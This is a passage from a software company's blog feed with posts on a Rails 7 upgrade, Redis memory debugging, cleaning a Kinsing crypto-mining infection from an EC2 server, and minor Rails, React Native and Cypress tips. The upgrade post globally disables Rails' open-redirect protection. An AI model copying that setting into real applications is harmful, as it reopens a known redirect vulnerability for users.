src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/cloudflare-heroku-neetochat.png" alt="Heroku DNS"></p>]]></content>
    </entry><entry>
       <title><![CDATA[How we upgraded from Rails 6 to Rails 7]]></title>
       <author><name>Abhishek T</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-upgraded-from-rails-6-to-rails-7"/>
      <updated>2022-09-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-upgraded-from-rails-6-to-rails-7</id>
      <content type="html"><![CDATA[<p>Recently, we upgraded all <a href="https://www.neeto.com/">neeto</a> products to Rails 7using<a href="https://guides.rubyonrails.org/upgrading_ruby_on_rails.html">Rails upgrade guide</a>.</p><p>Here are the issues we faced during the upgrade.</p><h3>Migrating to Active Record Encryption</h3><p>This was the biggest challenge we faced during the upgrade. For encryptingcolumns, we had used the<a href="https://github.com/attr-encrypted/attr_encrypted">attr_encrypted</a> gem. HoweverRails 7 came with<a href="https://guides.rubyonrails.org/active_record_encryption.html">Active Record Encryption</a>.So we needed to decrypt the records in the production database and encrypt themusing Active Record Encryption. We found that &quot;attr_encrypted&quot; gem wasincompatible with Rails 7. So the only option was to remove the &quot;attr_encrypted&quot;gem and decrypt the records using a script. We used the following method todecrypt the records.</p><pre><code class="language-rb">def decrypted_attribute(attribute_name, record)  value = record.send(attribute_name)  return if value.blank?  value = Base64.decode64(value)  cipher = OpenSSL::Cipher.new(&quot;aes-256-gcm&quot;)  cipher.decrypt  cipher.key = Rails.application.secrets.attr_encrypted[:encryption_key]  cipher.iv = Base64.decode64(record.send(:&quot;#{attribute_name}_iv&quot;))  cipher.auth_tag = value[-16..]  cipher.auth_data = &quot;&quot;  cipher.update(value[0..-17]) + cipher.finalend</code></pre><h3>Broken images in Active Storage</h3><p>After the upgrade, we started getting broken images in some places. Thishappened for Active Storage links embedded in Rich Text. After some debugging, wefound that we were getting incorrect Active Storage links because of a change inthe key generation algorithm. The following configuration was loading imagesusing the old algorithm.</p><pre><code class="language-rb">config.active_support.key_generator_hash_digest_class = OpenSSL::Digest::SHA1</code></pre><p>Since the new algorithm provides more security, we decided to migrate the linksinstead of using the old algorithm. We used the following code to migrate theold link to the new valid link.</p><pre><code class="language-rb"># Usage:# text_with_new_links = ActiveStorageKeyConverter.new(text_with_old_links).process# If no links are there to replace, the original text will be returned as it is.class ActiveStorageKeyConverter  def initialize(text)    @text = text  end  def process    replace(@text)  end  private    def convert_key(id)      verifier_name = &quot;ActiveStorage&quot;      key_generator =  ActiveSupport::KeyGenerator.new(Rails.application.secrets.      secret_key_base, iterations: 1000, hash_digest_class: OpenSSL::Digest::SHA1)      key_generator = ActiveSupport::CachingKeyGenerator.new(key_generator)      secret = key_generator.generate_key(verifier_name.to_s)      verifier = ActiveSupport::MessageVerifier.new(secret)      ActiveStorage::Blob.find_by_id(verifier.verify(id, purpose: :blob_id))      .try(:signed_id) rescue nil    end    def replace(text)      keys = text.scan(URI.regexp).flatten.select{|x|      x.to_s.include? (&quot;rails/active_storage&quot;)}.map{|x| x.split(&quot;/&quot;)[-2]}      keys.each do |key|        new_key = convert_key(key)        text = text.gsub(key, new_key) if new_key      end      text    endend</code></pre><p>Following one time rake task was used to update the Active Storage links in the<code>content</code> column of <code>Task</code> model:</p><pre><code class="language-rb">desc &quot;Update active storage links embedded in rich text to support in rails 7&quot;task migrate_old_activestorage_links: :environment do  table_colum_map = {    &quot;Task&quot; =&gt; &quot;content&quot;,  }  match_term = &quot;%rails/active_storage%&quot;  table_colum_map.each do |model_name, column_name|    model_name.to_s.constantize.where(&quot;#{column_name} ILIKE ?&quot;, match_term).find_each do|row|      row.update_column(column_name, ActiveStorageKeyConverter.new(row[column_name]).process)    end  endend</code></pre><h3>Test failures with the mailer jobs</h3><p>After upgrading to Rails 7, tests related to mailers started to fail. This wasbecause the mailer jobs were enqueued in the <code>default</code> queue instead of<code>mailers</code>. We fixed this by adding the following configuration.</p><pre><code class="language-rb">config.action_mailer.deliver_later_queue_name = :mailers</code></pre><h3>Autoloading during initialization failed</h3><p>After the upgrade, if we startthe Rails sever then we were getting the followingerror.</p><pre><code>$ rails s=&gt; Booting Puma=&gt; Rails 7.0.3.1 application starting in development=&gt; Run `bin/rails server --help` for more startup optionsExiting/Users/BB/Neeto/neeto_commons/lib/neeto_commons/initializers/session_store.rb:13:in`session_store': uninitialized constant #&lt;Class:NeetoCommons::Initializers&gt;::ServerSideSession     (NameError)    ActionDispatch::Session::ActiveRecordStore.session_class = ServerSideSession                                                                ^^^^^^^^^^^^^^^^^   from /Users/BB/Neeto/neeto-planner-web/config/initializers/common.rb:10:in `&lt;main&gt;'</code></pre><p>That error was coming from our internal <code>neeto-commons</code> initializer called<code>session_store.rb</code>. The code looked like this.</p><pre><code class="language-rb">#session_store.rbmodule NeetoCommons  module Initializers    class &lt;&lt; self      def session_store        Rails.application.config.session_store :active_record_store,          key: Rails.application.secrets.session_cookie_name, expire_after: 10.years.to_i        ActiveRecord::SessionStore::Session.table_name = &quot;server_side_sessions&quot;        ActiveRecord::SessionStore::Session.primary_key = &quot;session_id&quot;        ActiveRecord::SessionStore::Session.serializer = :json        ActionDispatch::Session::ActiveRecordStore.session_class = ServerSideSession      end    end  endend</code></pre><p>In order to fix the issue we had to put the last statement in a block like shownbelow.</p><pre><code class="language-rb">Rails.application.config.after_initialize do ActionDispatch::Session::ActiveRecordStore.session_class = ServerSideSessionend</code></pre><h3>Missing template error with pdf render</h3><p>After the Rails 7 upgrade the following test started failing.</p><pre><code class="language-rb">def test_get_task_pdf_download_success  get api_v1_project_section_tasks_download_path(@project.id, @section, @task, format: :pdf)  assert_response :ok  assert response.body.starts_with? &quot;%PDF-1.4&quot;  assert response.body.ends_with? &quot;%EOF\n&quot;end</code></pre><p>The actual error is <code>Missing template api/v1/projects/tasks/show.html.erb</code>.</p><p>In order to fix it we renamed the file name from <code>/tasks/show.html.erb</code> to<code>/tasks/show.pdf.erb</code>. Similarly we changed the layout from<code>/layouts/pdf.html.erb</code> to <code>/layouts/pdf.pdf.erb</code>.</p><p>Initially the controller code looked like this.</p><pre><code class="language-rb">format.pdf do  render \    template: &quot;api/v1/projects/tasks/show.html.erb&quot;    pdf: pdf_file_name,    layout: &quot;pdf.html.erb&quot;end</code></pre><p>After the change the code looked like this.</p><pre><code class="language-rb">format.pdf do  render \    template: &quot;api/v1/projects/tasks/show&quot;,    pdf: pdf_file_name,    layout: &quot;pdf&quot;end</code></pre><h3>Open Redirect protection</h3><p>After the Rails 7 upgrade the following test started failing.</p><pre><code class="language-rb">def test_that_users_are_redirected_to_error_url_when_invalid_subdomain_is_entered  invalid_subdomain = &quot;invalid-subdomain&quot;  auth_subdomain_url = URI(app_secrets.auth_app[:url].gsub(   app_secrets.app_subdomain, invalid_subdomain))  auth_app_url = app_secrets.auth_app[:url]  host! test_domain(invalid_subdomain)  get &quot;/&quot;  assert_redirected_to auth_app_urlend</code></pre><p>In the test we are expecting the application to redirect to <code>auth_app_url</code> butwe are getting <code>UnsafeRedirectError</code> error for open redirections. In Rails 7 thenew Rails defaults<a href="https://api.rubyonrails.org/v7.0.3.1/classes/ActionController/Redirecting.html#method-i-redirect_to-label-Open+Redirect+protection">protects</a>applications against the<a href="https://cwe.mitre.org/data/definitions/601.html">Open Redirect Vulnerability</a>.</p><p>To allow any external redirects we can pass <code>allow_other_host: true</code>.</p><pre><code class="language-rb">redirect_to &lt;External URL&gt;, allow_other_host: true</code></pre><p>Since we use open redirection in many places we disabled this protectionglobally.</p><pre><code class="language-rb">config.action_controller.raise_on_open_redirects = false</code></pre><h3>Argument Error for Mailgun signing key</h3><p>After the upgrade, we started getting the following error in production.</p><pre><code>&gt;&gt; ArgumentError: Missing required Mailgun Signing key. Set action_mailbox.mailgun_signing_keyin your application's encrypted credentials or provide the MAILGUN_INGRESS_SIGNING_KEYenvironment variable.</code></pre><p>Before Rails 7, we used the <code>MAILGUN_INGRESS_API_KEY</code> environment variable toset up the<a href="https://guides.rubyonrails.org/action_mailbox_basics.html#mailgun">Mailgun signing key</a>. In Rails 7, that is changed to <code>MAILGUN_INGRESS_SIGNING_KEY</code>. So we renamedthe environment variable to fix the problem.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Three case studies of debugging redis running out of memory]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-redis-memory-issue"/>
      <updated>2022-09-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-redis-memory-issue</id>
      <content type="html"><![CDATA[<p>In this blog, we will discuss three separate case studies of Redis runningout of memory. All three case studies have videos demonstrating how thedebugging was done.</p><p>All three videos were prepared for my team members to show how to go aboutdebugging. The videos are being presented &quot;as it was recorded&quot;.</p><h2>First Case Study</h2><p>When a job fails in <a href="https://sidekiq.org/">Sidekiq</a>, Sidekiq puts that job in<a href="https://github.com/mperham/sidekiq/wiki/API#retries">RetrySet</a> and retries thatjob until the job succeeds or the job reaches the maximum number of retries. Bydefault the maximum number of retries is 25. If a job fails 25 times, then thatjob is moved to the <a href="https://github.com/mperham/sidekiq/wiki/API#dead">DeadSet</a>.By default, Sidekiq will store up to 10,000 jobs in the deadset.</p><p>We had a situation where Redis was running out of memory. Here is how thedebugging was done.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/dg-K_IoT-x0&quot;title=&quot;YouTube video player&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><h3>How to inspect the deadset</h3><pre><code class="language-ruby">ds = Sidekiq::DeadSet.newds.each do |job|  puts &quot;Job #{job['jid']}: #{job['class']} failed at #{job['failed_at']}&quot;end</code></pre><p>Running the following to view the latest entry to the dataset:</p><pre><code class="language-ruby">ds.firstds.count</code></pre><p>To see the memory usage following commands were executed in the Redis console.</p><pre><code>&gt; memory usage dead30042467&gt; type deadzset</code></pre><p>As discussed in the video large amount of payload was being sent. This is notthe right way to send data to the worker. Ideally, some sort of <code>id</code> should besent to the worker and the worker should be able to get the necessary data fromthe database based on the received <code>id</code>.</p><h4>References</h4><ol><li><a href="https://github.com/mperham/sidekiq/discussions/5011">How to increase the number of jobs in the Sidekiq deadset or disable deadset</a></li><li><a href="https://github.com/mperham/sidekiq/blob/main/lib/sidekiq/job_retry.rb#L71">Maximum number of job retries in Sidekiq</a></li><li><a href="https://github.com/mperham/sidekiq/blob/a89d84509c569a78882e24e0e28913a22c9311f5/lib/sidekiq.rb#L38">Maximum number of jobs in Sidekiq Deadset</a></li></ol><h2>Second case study</h2><p>In this case, the Redis instance of <a href="https://www.neeto.com/neetochat/">neetochat</a>was running out of memory. The Redis instance had 50MB capacity, but we weregetting the following error.</p><pre><code>ERROR: heartbeat: OOM command not allowed when used memory &gt; 'maxmemory'.</code></pre><p>We were pushing too many geo info records to Redis and that caused the memory tofill up. Here is the video capturing the debugging session.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/oz7Pcbc_zxM&quot;title=&quot;YouTube video player&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>The following are the commands executed while debugging.</p><pre><code>&gt; pingPONG&gt; info&gt; info memory&gt; info keyspace&gt; keys *failed*&gt; keys *process*&gt; keys *geocoder*&gt; get getocoder:http://ipinfo.io/41.174.30.55/geo?</code></pre><h2>Third Case Study</h2><p>In this case, the authentication service of <a href="https://www.neeto.com/">Neeto</a> wasfailing because of memory exhaustion.</p><p>Here the number of keys was limited, but the payload data was huge and all thatpayload data was hogging the memory. Here is the video capturing the debuggingsession.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/a_Ygbcreokw&quot;title=&quot;YouTube video player&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>The following are the commands executed while debugging.</p><pre><code>&gt; ping&gt; info keyspacedb0:keys=106, expires=86,avg_ttl=1233332728573&gt; key * (to see all the keys)</code></pre><p>The last command listed all 106 keys. Next, we needed to find how much memoryeach of these keys are using. For that, the following commands were executed.</p><pre><code>&gt; memory usage organizations/subdomains/bigbinary/neeto_app_links736 bytes&gt; memory usage failed10316224 (10MB)&gt; memory usage dead29871174 (29MB)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[How my server got infected with a crypto mining malware and how I fixed it]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it"/>
      <updated>2022-09-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it</id>
      <content type="html"><![CDATA[<p>I was working on a side project recently, where I faced an issue when running aPostgreSQL database. The database server was getting shut down randomly for noapparent reason. I had deployed my Rails application along with itsdependencies, like Redis and PostgreSQL, in one of my EC2 instances in AWS.</p><p>PostgreSQL was running on the machine at the default port of <code>5432</code>. Ports <code>443</code>and <code>80</code> were open to everyone, for handling HTTP/S traffic. Port <code>22</code> was alsoopen to everyone, so that anyone with their public SSH keys added in the<code>authorized_keys</code> file in the remote server, or having access to the private keyfile of the server could log into the machine remotely.</p><p>For development, I needed to access this remote database locally, so I editedthe <code>pg_hba.conf</code> file and opened PostgreSQL to the network. I added a new ruleto open port <code>5432</code> so that anyone could connect to the PostgreSQL instanceremotely if they had all the credentials. If you notice in the screenshot, youwill see all the ports that are open to the public network. This was all workinggreat for me, until one fine day it wasnt.</p><p><img src="/blog_images/2022/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it/aws-before.png" alt="The networking screen in AWS where you can add inbound port rules."></p><p>I realized that something was wrong when I couldnt connect to the PostgreSQLinstance remotely one day. The response I was getting was the standard<code>is PostgreSQL running?</code> error.</p><pre><code class="language-bash">psql: could not connect to server: No such file or directoryConnection refused Is the server running on host ${hostname}and accepting TCP/IP connections on port 5432?</code></pre><p>I was still able to SSH into the VM so I tried to restart PostgreSQL. After someinvestigation I figured out that PostgreSQL was back up momentarily when I do<code>systemctl restart postgresql</code>, but it goes down again.</p><p>Inspecting the processes with <code>htop</code> I was able to see that all the CPU coreswere at 100% usage. Something didnt feel right. Sorting the processes based onthe percentage of CPU and memory used, I came across two peculiar processes -<code>kdevtmpfsi</code> and <code>kinsing</code>. A quick Google search showed that this was a cryptomining malware that spreads by exploiting flaws in resources that are exposed tothe public. Killing the process was of no use since the malware also adds a cronjob to replicate itself so that it cant be stopped.</p><h3>Removing the malware</h3><p>I found all files in the system with <code>kdevtmpfsi</code> and <code>kinsing</code> in their namesusing the unix <code>find</code> command and deleted them. The malwares files was insidethe <code>/tmp</code> directory.</p><pre><code class="language-bash">find / -name kdevtmpfsi*find / -name kinsing*</code></pre><p>Then I checked if there were any cron jobs running on the machine with the<code>crontab</code> command. There were some jobs running that were there to reload themalware script, even if you delete it. I deleted the jobs related to<code>kdevtmpfsi</code> and <code>kinsing</code>. Another information I learnt was that in Unix, eachuser will have their own crontab which can run jobs as that particular user.</p><pre><code class="language-bash">crontab -l  #To list all running cron jobscrontab -e #To delete running jobs</code></pre><h3>Things to pay attention to</h3><p>I made all the passwords stronger, especially for the resources that were beingexposed to the public. One of the lessons I learnt was that you can always bemore secure, and that you should never compromise on your passwords. Thepasswords that I had set for my users were weak, with just a dictionary word, adigit and a special character - something like the format of <code>himalaya7!</code></p><p>Instead of opening the required ports to the public network, I exposed them toonly the IP addresses from which I needed to access it.</p><p>Notice how the ports for SSH and PostgreSQL are only exposed to the required IPaddresses now.</p><p><img src="/blog_images/2022/how-my-server-got-infected-with-a-crypto-mining-malware-and-how-I-fixed-it/aws-after.png" alt="how ports 22 and 5432 are only open to certain IP addresses now"></p><p>I moved the application database to a managed PostgreSQL service rather thanrunning it in a VM by myself. This also means that I need not worry about theperformance or uptime, as all of this will be taken care of by AWS itself.</p><p>For extra security, I also set up a reverse proxy so that no one can ping mydeployed URL and get the IP address of the VM where the application is running.</p><p>Securing your deployments is as important as any other step when deploying yourapplication and it needs to be a priority right from when you are designing thearchitecture of your application. Taking care of such small details duringdevelopment will facilitate you in writing good code and following the rightpatterns from the start.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows infinite ranges for LengthValidators and Clusivity validators]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-endless-ranges-for-activemodel-validations"/>
      <updated>2022-08-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-endless-ranges-for-activemodel-validations</id>
      <content type="html"><![CDATA[<p>Rails 7.1 adds support for infinite ranges for Active Model validations, whichuse the <code>:in</code>, and <code>:within</code> options. It was already possible to query usinginfinite ranges in Active Record like so:</p><pre><code class="language-ruby">Book.where(purchases: 20..)# Returns a collection of records with purchases from 20 and upwards.Book.where(purchases: ..20)# Returns a collection of records with purchases from 20 and below.</code></pre><p>But the same idea of using infinite ranges in Active Model validations waslimited in scope. Rails 7.1 extends this scope of usage by adding support forinfinite ranges in Active Model validations. For example, validating the lengthof <code>first_name</code> without an upper bound for a <code>User</code> will be as simple aswriting:</p><pre><code class="language-ruby">class User    # ...    validates_length_of :first_name, in: 20..end</code></pre><p>The length of the <code>:first_name</code> does not have an upper bound. As long as thelength is greater than or equal to 20, it will remain valid.</p><p>The above example also holds true when using the <code>:within</code> option as well:</p><pre><code class="language-ruby">class User    # ...    validates_length_of :first_name, within: 20..end</code></pre><p>In a similar example, let's look at how we would use Active Model validationsalong with the <code>:inclusion</code> option:</p><pre><code class="language-ruby">class User    # ...    validates :age, inclusion: { in: proc { (25..) } }end</code></pre><p>The above example would validate the <code>:age</code> field such that, it's value needs tobe 25 or above for the record to be valid.</p><p>Please check out the following pull requests for more details:</p><ol><li><a href="https://github.com/rails/rails/pull/45138">Infinite ranges for LengthValidator</a></li><li><a href="https://github.com/rails/rails/pull/45123">Infinite ranges for Clusivity validator</a></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 raises RuntimeError if Active Storage service is not specified]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-raises-error-if-active-storage-service-not-specified"/>
      <updated>2022-08-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-raises-error-if-active-storage-service-not-specified</id>
      <content type="html"><![CDATA[<p>If Active Storage has been configured, and the service type has not beenexplicitly set in the respective environment's configuration file, then tryingto use active storage throws the following error message:</p><pre><code class="language-plaintext">Failed to replace attachments_attachments because one or more of the new records could not be saved.</code></pre><p>This is not helpful, and it doesn't indicate where to make the required changesfor Active Storage to be able to save the attachment(s). It also allows theapplication to start as if a valid service has been set for Active Storage touse. Starting Rails 7.1, if <code>config.active_storage.service</code> has not beenexplicitly set, then even attempting to start the application would throw a<code>RuntimeError</code> with the following error message:</p><pre><code class="language-plaintext">Missing Active Storage service name. Specify Active Storage service name for config.active_storage.service in config/environments/production.rb</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/44372">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds callbacks for Action Cable commands at the connection level]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-callbacks-for-action-cable-connection"/>
      <updated>2022-08-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-callbacks-for-action-cable-connection</id>
      <content type="html"><![CDATA[<p>Action Cable allows us to add callbacks for individual channels. These are:<code>after_subscribe</code>, <code>after_unsubscribe</code>, <code>before_subscribe</code>,<code>before_unsubscribe</code>, <code>on_subscribe</code>, <code>on_unsubscribe</code>. These callbacks areregistered individually for each Channel. Before Rails 7.1, there was no way inwhich we could register callbacks to be called before every command generically.Rails 7.1 solves this problem by providing a set of callbacks that can beregistered at the connection level. And these callbacks are called for everycommand, regardless of which channel's command is being invoked.</p><p>These are the following callbacks, which can be registered:</p><ol><li><code>before_command</code>: This callback is invoked before any command can beprocessed by the channel.</li><li><code>around_command</code>: This callback is generally invoked around the command. Anypiece of code before <code>yield</code> is run before the actual command and any pieceof code after <code>yield</code> is run after the command has been processed by thechannel.</li><li><code>after_command</code>: This callback is invoked after the command has beenprocessed by the channel.</li></ol><p>Let's take a look at some example code to understand this behaviour better:</p><pre><code class="language-ruby">class Connection &lt; ActionCable::Connection::Base  identified_by :current_user  before_command :set_current_user  around_command :register_telemetry_data  after_command :update_current_user  private    def set_current_user      if request.params[&quot;user_id&quot;].present?        self.current_user = User.find_by(request.params[&quot;user_id&quot;])      end      reject_unauthorized_connection if self.current_user.nil?    end    def register_telemetry_data      self.current_user.register_telemetry({ start: true })      yield      self.current_user.register_telemetry({ end: true })    end    def update_current_user      self.current_user.touch(:updated_at)    endend</code></pre><p>Here, we can expect <code>set_current_user</code> to be invoked before every command isprocessed. Similar to this, we can also expect <code>update_current_user</code> to beinvoked after every command is processed. Whereas for the<code>register_telemetry_data</code>,<code>self.current_user.register_telemetry({ start: true })</code> is run before thecommand is processed and then after the command is processed,<code>self.current_user.register_telemetry({ end: true })</code> is run.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/44696">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to remove the white screen just before the splash screen in Android]]></title>
       <author><name>Kamolesh Mondal</name></author>
      <link href="https://www.bigbinary.com/blog/adding-splash-screen-in-react-native-cli-app"/>
      <updated>2022-07-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/adding-splash-screen-in-react-native-cli-app</id>
      <content type="html"><![CDATA[<p>In order to add a splash screen, we'll use the<a href="https://www.npmjs.com/package/react-native-splash-screen">react-native-splash-screen</a>package. While most of the job is done by following the installation steps,there are some additional steps we need to follow for Android.</p><p>There's a concept known as the &quot;preview window&quot; in Android which serves a basicpurpose of faking a fast launch of an app when the app icon is clicked. Whilepreview window fakes fast launching, it shows an empty white screen until theapp has loaded. More info available in<a href="https://www.tothenew.com/blog/disabling-the-preview-or-start-window-in-android/">this</a>article.</p><p>The preview window can itself be disabled by adding the following line in the<code>android/app/src/main/res/values/styles.xml</code> file.</p><pre><code class="language-xml">&lt;item name=&quot;android:windowDisablePreview&quot;&gt;true&lt;/item&gt;</code></pre><p>However, disabling the preview window introduces an undesirable delay betweenclicking on the app icon and the actual launching of the app.</p><p>We can get rid of the delay and the empty white screen by adding an additionalsplash activity.</p><h2>Additional steps for Android</h2><ul><li><p>Create a background_splash.xml file with the same design you used in<code>launch_screen.xml</code> during the installation above.</p></li><li><p>Place this new xml file inside the <code>android/app/src/main/res/drawable</code>directory.</p></li><li><p>Create a new splash theme in the <code>android/app/src/main/res/values/styles.xml</code>file by adding the following snippet.</p><pre><code class="language-xml">&lt;style name=&quot;SplashTheme&quot; parent=&quot;Theme.AppCompat.Light.NoActionBar&quot;&gt;    &lt;item name=&quot;android:windowBackground&quot;&gt;@drawable/background_splash&lt;/item&gt;&lt;/style&gt;</code></pre></li><li><p>Create a new splash activity to call the main activity, and add the followingcode in it.</p><pre><code class="language-java">package com.example;import android.content.Intent;import android.os.Bundle;import androidx.appcompat.app.AppCompatActivity;public class SplashActivity extends AppCompatActivity {    @Override    protected void onCreate(Bundle savedInstanceState){        super.onCreate(savedInstanceState);        Intent intent = new Intent(this, MainActivity.class);        startActivity(intent);        finish();    }}</code></pre></li><li><p>Finally, we will call this activity first on launch with the splash theme wecreated above.</p></li><li><p>Add the new activity in AndroidManifest.xml.</p><pre><code class="language-xml">&lt;activity android:name=&quot;.SplashActivity&quot; android:label=&quot;@string/app_name&quot; android:launchMode=&quot;singleTask&quot; android:theme=&quot;@style/SplashTheme&quot;&gt;  &lt;intent-filter&gt;    &lt;action android:name=&quot;android.intent.action.MAIN&quot; /&gt;    &lt;category android:name=&quot;android.intent.category.LAUNCHER&quot; /&gt;  &lt;/intent-filter&gt;&lt;/activity&gt;</code></pre></li><li><p>The intent-filter tag, with its &quot;MAIN&quot; action and &quot;LAUNCHER&quot; categorychildren, allows us to call this new activity first on launch. It's usuallyfound in the main activity by default, so we have to remove them entirely fromthere, leaving them exclusively in <code>SplashActivity</code>.</p></li></ul><p>Once we've done all this, we can rebuild the app and run it with<code>npx react-native run-android</code> to see the splashscreen we created.</p><p>The app should now launch quickly with no empty white screen on startup.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows audio_tag and video_tag to receive Active Storage attachments]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-extends-support-for-audio-tag-and-video-tag"/>
      <updated>2022-07-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-extends-support-for-audio-tag-and-video-tag</id>
      <content type="html"><![CDATA[<p>Rails 7.1 allows <code>audio_tag</code> and <code>video_tag</code> ActionView helpers to receiveActive Storage Attachments which implicitly unpacks the asset path to beincluded in the <code>src</code> attribute of the <code>&lt;audio&gt;&lt;/audio&gt;</code> and <code>&lt;video&gt;&lt;/video&gt;</code>tags.</p><p>Previously, the helper methods received only the asset path/url. To get theasset path of an Active Storage Attachment, we had to explicitly call<code>polymorphic_path</code> on the attachment, which returned the desired asset path.</p><h3>Before</h3><pre><code class="language-ruby">audio_tag(polymorphic_path(user.audio_file))# =&gt; &lt;audio src=&quot;/...&quot;&gt;&lt;/audio&gt;video_tag(polymorphic_path(user.video_file))# =&gt; &lt;video src=&quot;/...&quot;&gt;&lt;/video&gt;</code></pre><h3>After</h3><pre><code class="language-ruby">audio_tag(user.audio_file)# =&gt; &lt;audio src=&quot;/...&quot;&gt;&lt;/audio&gt;video_tag(user.video_file)# =&gt; &lt;video src=&quot;/...&quot;&gt;&lt;/video&gt;</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/44085">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 returns the Active Storage attachment(s) after saving the attachment]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-returns-active-storage-blob-after-save"/>
      <updated>2022-07-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-returns-active-storage-blob-after-save</id>
      <content type="html"><![CDATA[<p>Previously, saving an attachment to a record returned a boolean, indicatingwhether or not the attachment was saved to the record. This is not helpful sincewe have to dig into the record again to retrieve the attachment. Starting Rails7.1, saving an attachment to a record returns the saved attachment. We can nowconveniently use blob methods like <code>#download</code>, <code>#url</code>, <code>#variant</code> etc on theattachment without having to dig into the record again.</p><h3>Before</h3><pre><code class="language-ruby"># rails console&gt;&gt; @user = User.create!(name: &quot;Josh&quot;)&gt;&gt; @user.avatar.attach(params[:avatar])=&gt; true</code></pre><h3>After</h3><pre><code class="language-ruby"># rails console&gt;&gt; @user = User.create!(name: &quot;Josh&quot;)&gt;&gt; @user.avatar.attach(params[:avatar])=&gt; #&lt;ActiveStorage::Attached::One:0x00007f075e592380 @name=&quot;avatar&quot; @record=#&lt;User:0x00007f075e5924e8 id: &quot;1&quot;, name: &quot;Josh&quot;&gt;</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/44439">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling SIGHUP error from Heroku]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/fix-sighup-error-from-heroku"/>
      <updated>2022-04-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/fix-sighup-error-from-heroku</id>
      <content type="html"><![CDATA[<p>A video on handling SIGHUP error from Heroku. We also get to see how to use <code>notify_at_exit</code> feature of<a href="https://www.honeybadger.io">Honeybadger</a>. Please note that this was an internal video which we are publishing as is.</p><p>&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/f8yXrceAotQ&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configure cypress to run tests in multiple environments]]></title>
       <author><name>Datt Dongare</name></author>
      <link href="https://www.bigbinary.com/blog/cypress-environment-config"/>
      <updated>2022-03-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cypress-environment-config</id>
      <content type="html"><![CDATA[<p>When we write tests, we want to run them in the local environment first. There arefew reasons for this. We need to add <code>data-cy</code>, verify and run the tests. Also,we need to make sure that tests are running fine on the local/developmentenvironment before running them in test/staging environment. Another case mightbe the one where we need to set the CI pipeline to execute in differentenvironments.</p><p>In such scenarios, the <code>baseUrl</code> will be different in both environments. Butcypress allows us to configure <code>baseUrl</code> only once in <code>cypress.json</code> . Then, howdo we configure <code>baseUrl</code> specific for each of the environments? In this blog,we will see how to configure cypress step by step so that we can run cypresstests in multiple environments.</p><h2>1. Add environment specific configuration</h2><p>To configure Cypress for different environments, we can follow the two simplesteps.</p><ol><li>Create <code>config</code> folder in cypress.</li><li>Create separate files for each of the environments.</li></ol><pre><code class="language-javascript">// cypress/config/cypress.development.json{  &quot;baseUrl&quot;: &quot;https://localhost:9006&quot;,  &quot;env&quot;: {    &quot;environment&quot;: &quot;development&quot;  },  